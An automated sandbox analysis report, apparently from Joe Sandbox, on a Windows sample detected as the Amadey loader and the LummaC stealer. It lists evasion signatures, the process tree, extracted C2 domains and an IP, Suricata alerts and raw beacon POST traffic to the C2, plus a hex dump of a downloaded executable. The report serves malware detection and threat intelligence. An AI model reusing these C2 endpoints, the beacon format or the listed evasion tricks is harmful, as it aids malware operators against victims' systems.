Edit tour

Windows Analysis Report
L0erlgyZ6f.exe

Overview

General Information

Sample name:	L0erlgyZ6f.exe renamed because original name is a hash value
Original sample name:	f90ba46d886c0e6f9d0bbe702ca2f535.exe
Analysis ID:	1636872
MD5:	f90ba46d886c0e6f9d0bbe702ca2f535
SHA1:	e177ecba5530e2e04d255182112b63ba5d49b4a4
SHA256:	921eefb9c8a07ecfcb836f7859efc081d55f6709dc011c1af16e0a019a029791
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to start a terminal service

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Potentially malicious time measurement code found

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

L0erlgyZ6f.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\L0erlgyZ6f.exe" MD5: F90BA46D886C0E6F9D0BBE702CA2F535)

rapes.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: F90BA46D886C0E6F9D0BBE702CA2F535)

rapes.exe (PID: 7892 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: F90BA46D886C0E6F9D0BBE702CA2F535)

958e367d97.exe (PID: 5180 cmdline: "C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe" MD5: B0980240B253050B46B581237E97CA56)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: LummaC

{"C2 url": ["cocjkoonpillow.today/bVzx", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000000.00000002.1218362790.0000000000F71000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000A.00000002.3622417098.0000000000451000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security

Unpacked PEs

Source	Rule	Description	Author
13.2.958e367d97.exe.340000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.rapes.exe.450000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
10.2.rapes.exe.450000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.L0erlgyZ6f.exe.f70000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:21:38.007579+0100	2028371	3	Unknown Traffic	192.168.2.4	49766	104.21.48.1	443	TCP
2025-03-13T08:21:44.539788+0100	2028371	3	Unknown Traffic	192.168.2.4	49772	188.114.97.3	443	TCP
2025-03-13T08:21:50.959367+0100	2028371	3	Unknown Traffic	192.168.2.4	49778	188.114.97.3	443	TCP
2025-03-13T08:21:58.058700+0100	2028371	3	Unknown Traffic	192.168.2.4	49783	104.21.16.1	443	TCP
2025-03-13T08:22:05.346436+0100	2028371	3	Unknown Traffic	192.168.2.4	49790	104.21.16.1	443	TCP
2025-03-13T08:22:12.484937+0100	2028371	3	Unknown Traffic	192.168.2.4	49796	104.21.96.1	443	TCP
2025-03-13T08:22:18.343997+0100	2028371	3	Unknown Traffic	192.168.2.4	49802	104.73.234.102	443	TCP
2025-03-13T08:22:22.500252+0100	2028371	3	Unknown Traffic	192.168.2.4	49804	104.21.64.1	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:21:24.726777+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49762	176.113.115.6	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:21:29.205810+0100	2803305	3	Unknown Traffic	192.168.2.4	49764	176.113.115.7	80	TCP

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:21:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 13 Mar 2025 06:58:44 GMTETag: "20d400-63033da4cfcb7"Accept-Ranges: bytesContent-Length: 2151424Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b0 00 00 00 00 00 00 00 a0 4c 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4c 00 00 04 00 00 d8 09 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 00 06 00 00 04 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2b 00 00 20 06 00 00 02 00 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 76 77 6b 7a 66 64 61 00 b0 1a 00 00 e0 31 00 00 a6 1a 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 6f 66 63 66 67 74 00 10 00 00 00 90 4c 00 00 04 00 00 00 ae 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4c 00 00 22 00 00 00 b2 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
